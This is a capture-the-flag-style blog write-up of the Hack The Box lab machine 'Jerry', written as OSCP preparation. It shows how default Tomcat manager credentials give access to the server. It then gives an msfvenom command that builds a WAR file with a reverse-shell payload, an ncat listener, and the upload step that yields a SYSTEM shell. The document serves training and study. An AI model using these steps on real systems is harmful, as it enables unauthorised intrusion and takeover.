Road to OSCP - Hack The Box Write Up - Jerry

Blog

22
- June
2019
Posted by: Ángel Guzmán
[Cybersecurity & hacking tools and techniques]
Road to OSCP - Hack The Box Write Up - Jerry

Hack the Box is an online platform to test and advance your skills in penetration testing and cyber security.

In this series of articles we will show how junior evaluators complete some Hack The Box machines in their road to OSCP, a well-known, respected, and required for many top cybersecurity positions certification. Certified OSCPs are able to identify existing vulnerabilities and execute organized attacks in a controlled and focused manner. They can leverage or modify existing exploit code to their advantage, perform network pivoting and data exfiltration, and compromise systems due to poor configurations.

Let's start with the fun!

Jerry

Initial Foothold

Enumerating the web page on port 8080 we stumble upon http://10.10.10.95:8080/manager/status. It asks for authentication and if we click on "cancel", we receive a 401 (unauthorized).

However, the message gives an example of adding credentials to the Tomcat configuration: tomcat:s3cret. It turns out, those are actually valid credentials to enter that same page.

401 message (truncated)

If you have not changed any configuration files, please examine the file conf/tomcat-users.xml in your installation. That file must contain the credentials to let you use this webapp.

For example, to add the admin-gui role to a user named tomcat with a password of s3cret, add the following to the config file listed above.

So we manage to access the server status. It has a bunch of info:

  • Apache Tomcat Version 7.0.88.
  • Os name: Windows Server 2012 R2.
  • Os architecture: amd64.
  • Os version: 6.3.
  • JVM version: 1.8.0_171-b11.
  • Hostname: JERRY.

Root

If we now go to http://jerry:8080/manager/html/list, we find that we can upload WAR files. Maybe we can exploit this somehow.

Yep, we can, following this blog.

  1. Generate payload: msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.17 LPORT=6969 -f war > shell.war.
  2. Set up listener: ncat -lnvp 6969.
  3. Upload the file shell.war.
  4. Our file should now appear on the list, click on the name.

We have successfully spawned a shell as nt authority\system.

tags
Ángel Guzmán/Junior evaluator

Degree and Master in telecommunications by the University of Granada, specialized in telematics. Joined jtsec in November of 2019 as a Junior cybersecurity evaluator.

Since he joined jtsec, he has participated in several internal hardware hacking projects, while also receiving training about the LINCE certification.

His main motivation is to learn, from small tools for his daily work to new technologies.


Contact

Send us your questions or suggestions!

By sending your data you allow us to use it to resolve your doubts by sending you commercial information of interest. We will delete it when they are no longer necessary for this matter. Know your rights in our Privacy Policy.
RECENT POSTS
jtsec achieves pioneering accreditation for MEMeC cryptologic evaluation
Jan 17, 2025
jtsec achieves pioneering accreditation for MEMeC cryptologic evaluation
jtsec & Applus+ Laboratories at ICCC24
Nov 14, 2024
jtsec & Applus+ Laboratories at ICCC24
How to use the CCN product catalog to improve your company's security
Oct 14, 2024
How to use the CCN product catalog to improve your company's security
Common Criteria Statistics 2023
June 17, 2024
Common Criteria Statistics 2023
How to enter ENS category high, stay in the catalog and add new versions of my product
April 23, 2024
How to enter ENS category high, stay in the catalog and add new versions of my product
jtsec - Our LINCE 2023
Febr 6, 2024
jtsec - Our LINCE 2023
We wish you a happy and cybersecure 2024
Dec 19, 2023
We wish you a happy and cybersecure 2024
How to Prepare Your Products and Services for the Quantum Era and Ensure Their Certification?
Dec 14, 2023
How to Prepare Your Products and Services for the Quantum Era and Ensure Their Certification?
How to include your product or service in ENS ALTA.
Oct 31, 2023
How to include your product or service in ENS ALTA.
Certifications and cybersecurity methodologies are generating interest among companies and organizations at both the national and international levels.
Sept 19, 2023
Certifications and cybersecurity methodologies are generating interest among companies and organizations at both the national and international levels.
CATEGORIES